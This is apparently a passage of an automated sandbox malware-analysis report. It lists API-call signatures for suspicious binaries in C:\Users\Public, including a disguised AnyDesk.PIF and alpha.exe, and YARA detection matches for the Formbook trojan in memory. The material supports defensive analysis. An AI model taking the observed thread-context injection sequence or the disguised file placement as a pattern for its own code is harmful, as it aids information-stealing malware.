          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D5DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D58D70 GetThreadContext,SetThreadContext,NtResumeThread
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D58D6E GetThreadContext,SetThreadContext,NtResumeThread
          Source: C:\Users\Public\alpha.exe; Code function: 11_2_00007FF6E9438114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
          Source: C:\Users\Public\alpha.exe; Code function: 11_2_00007FF6E9437FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
          Source: C:\Users\Public\alpha.exe; Code function: 11_2_00007FF6E943898C NtQueryInformationToken
          Source: C:\Users\Public\alpha.exe; Code function: 11_2_00007FF6E9423D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
          Source: C:\Users\Public\alpha.exe; Code function: 11_2_00007FF6E9451538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
          Source: C:\Users\Public\alpha.exe; Code function: 11_2_00007FF6E94389E4 NtQueryInformationToken,NtQueryInformationToken
          Source: C:\Users\Public\alpha.exe; Code function: 11_2_00007FF6E94388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
          Source: C:\Users\Public\alpha.exe; Code function: 11_2_00007FF6E944BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E9425240 memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E9434224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685428D007_2_00007FF685428D00
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A2CF87_2_00007FF6854A2CF8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685468D2C7_2_00007FF685468D2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685472D187_2_00007FF685472D18
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685508CF47_2_00007FF685508CF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C6B947_2_00007FF6854C6B94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685434B687_2_00007FF685434B68
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541AC087_2_00007FF68541AC08
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545CBFC7_2_00007FF68545CBFC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685460C287_2_00007FF685460C28
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685488BD47_2_00007FF685488BD4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C76787_2_00007FF6854C7678
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F76787_2_00007FF6854F7678
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854676B07_2_00007FF6854676B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CD6A07_2_00007FF6854CD6A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854556487_2_00007FF685455648
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F36387_2_00007FF6854F3638
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E56607_2_00007FF6854E5660
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543D6607_2_00007FF68543D660
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854ED6DC7_2_00007FF6854ED6DC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F6D87_2_00007FF68549F6D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544B58C7_2_00007FF68544B58C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E95807_2_00007FF6854E9580
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544156C7_2_00007FF68544156C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541F6107_2_00007FF68541F610
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854995FC7_2_00007FF6854995FC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854755F07_2_00007FF6854755F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854778907_2_00007FF685477890
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A184C7_2_00007FF6854A184C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E38747_2_00007FF6854E3874
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AD8587_2_00007FF6854AD858
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854658CC7_2_00007FF6854658CC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542B7887_2_00007FF68542B788
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854697907_2_00007FF685469790
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854937607_2_00007FF685493760
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542F8007_2_00007FF68542F800
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854318307_2_00007FF685431830
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C38207_2_00007FF6854C3820
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854877C87_2_00007FF6854877C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854517D47_2_00007FF6854517D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547D7F07_2_00007FF68547D7F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C52907_2_00007FF6854C5290
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854ED2B47_2_00007FF6854ED2B4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A53187_2_00007FF6854A5318
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854792C47_2_00007FF6854792C4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541F2C07_2_00007FF68541F2C0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546D2C07_2_00007FF68546D2C0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854892D87_2_00007FF6854892D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F1687_2_00007FF68549F168
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854611C87_2_00007FF6854611C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542D1B87_2_00007FF68542D1B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854631E07_2_00007FF6854631E0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C94947_2_00007FF6854C9494
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855094A87_2_00007FF6855094A8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854774787_2_00007FF685477478
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854354A07_2_00007FF6854354A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854154387_2_00007FF685415438
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545D4407_2_00007FF68545D440
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BD4607_2_00007FF6854BD460
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548F5207_2_00007FF68548F520
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E14F07_2_00007FF6854E14F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854FB3AC7_2_00007FF6854FB3AC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854473407_2_00007FF685447340
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543B36C7_2_00007FF68543B36C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548D4107_2_00007FF68548D410
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854173F87_2_00007FF6854173F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545F4347_2_00007FF68545F434
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855033D07_2_00007FF6855033D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855133D47_2_00007FF6855133D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549DEB07_2_00007FF68549DEB0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546DEA47_2_00007FF68546DEA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549BE707_2_00007FF68549BE70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A5F047_2_00007FF6854A5F04
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685461ED07_2_00007FF685461ED0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685499EE47_2_00007FF685499EE4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551DD847_2_00007FF68551DD84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854ABDA07_2_00007FF6854ABDA0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685469D6C7_2_00007FF685469D6C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C7D707_2_00007FF6854C7D70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685471D707_2_00007FF685471D70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685445DF77_2_00007FF685445DF7
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A1E2C7_2_00007FF6854A1E2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685421DE87_2_00007FF685421DE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E20847_2_00007FF6854E2084
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854480807_2_00007FF685448080
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547C0B87_2_00007FF68547C0B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685411F807_2_00007FF685411F80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C9FF87_2_00007FF6854C9FF8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854780187_2_00007FF685478018
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685427AB47_2_00007FF685427AB4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548BA487_2_00007FF68548BA48
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685443A407_2_00007FF685443A40
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C9A587_2_00007FF6854C9A58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685461A607_2_00007FF685461A60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DBB287_2_00007FF6854DBB28
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685477AC87_2_00007FF685477AC8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F9907_2_00007FF68549F990
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854919AC7_2_00007FF6854919AC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855079387_2_00007FF685507938
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68550994C7_2_00007FF68550994C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685411A107_2_00007FF685411A10
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543F9B87_2_00007FF68543F9B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685491C907_2_00007FF685491C90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551FC907_2_00007FF68551FC90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542BCA47_2_00007FF68542BCA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685463C607_2_00007FF685463C60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685425D087_2_00007FF685425D08
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544DD207_2_00007FF68544DD20
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685449CD07_2_00007FF685449CD0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D9CC07_2_00007FF6854D9CC0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546BCE87_2_00007FF68546BCE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685481B847_2_00007FF685481B84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541FB847_2_00007FF68541FB84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685415BA47_2_00007FF685415BA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BFB507_2_00007FF6854BFB50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A7B747_2_00007FF6854A7B74
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C3C107_2_00007FF6854C3C10
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546FC347_2_00007FF68546FC34
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544FC207_2_00007FF68544FC20
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685439BC87_2_00007FF685439BC8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547DBF07_2_00007FF68547DBF0
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D420C410_2_02D420C4
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D9BDF410_2_02D9BDF4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942AA5411_2_00007FF6E942AA54
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E943555411_2_00007FF6E9435554
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9428DF811_2_00007FF6E9428DF8
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E943785411_2_00007FF6E9437854
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942341011_2_00007FF6E9423410
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94337D811_2_00007FF6E94337D8
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944EE8811_2_00007FF6E944EE88
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942E68011_2_00007FF6E942E680
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942D25011_2_00007FF6E942D250
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9429E5011_2_00007FF6E9429E50
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942765011_2_00007FF6E9427650
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942524011_2_00007FF6E9425240
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9430A6C11_2_00007FF6E9430A6C
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9447F0011_2_00007FF6E9447F00
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942372C11_2_00007FF6E942372C
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9426EE411_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E945153811_2_00007FF6E9451538
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942CE1011_2_00007FF6E942CE10
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9424A3011_2_00007FF6E9424A30
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944AA3011_2_00007FF6E944AA30
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942222011_2_00007FF6E9422220
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E943422411_2_00007FF6E9434224
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94281D411_2_00007FF6E94281D4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944D9D011_2_00007FF6E944D9D0
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942188411_2_00007FF6E9421884
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944AC4C11_2_00007FF6E944AC4C
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9422C4811_2_00007FF6E9422C48
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942851011_2_00007FF6E9428510
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9427D3011_2_00007FF6E9427D30
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94318D411_2_00007FF6E94318D4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942B0D811_2_00007FF6E942B0D8
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9423F9011_2_00007FF6E9423F90
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9429B5011_2_00007FF6E9429B50
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9425B7011_2_00007FF6E9425B70
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944AFBC11_2_00007FF6E944AFBC
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9426BE011_2_00007FF6E9426BE0
          Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF6E9433448 appears 54 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68544BC9C appears 280 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854AEB98 appears 93 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6855264A6 appears 173 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854D7BAC appears 34 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68541D1C8 appears 41 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854D7D70 appears 35 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854D0D10 appears 181 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854CABFC appears 818 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68551F1B8 appears 183 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68551F11C appears 37 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D44500 appears 33 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D44860 appears 949 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D446D4 appears 244 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D589D0 appears 45 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D444DC appears 74 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D5894C appears 56 times
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
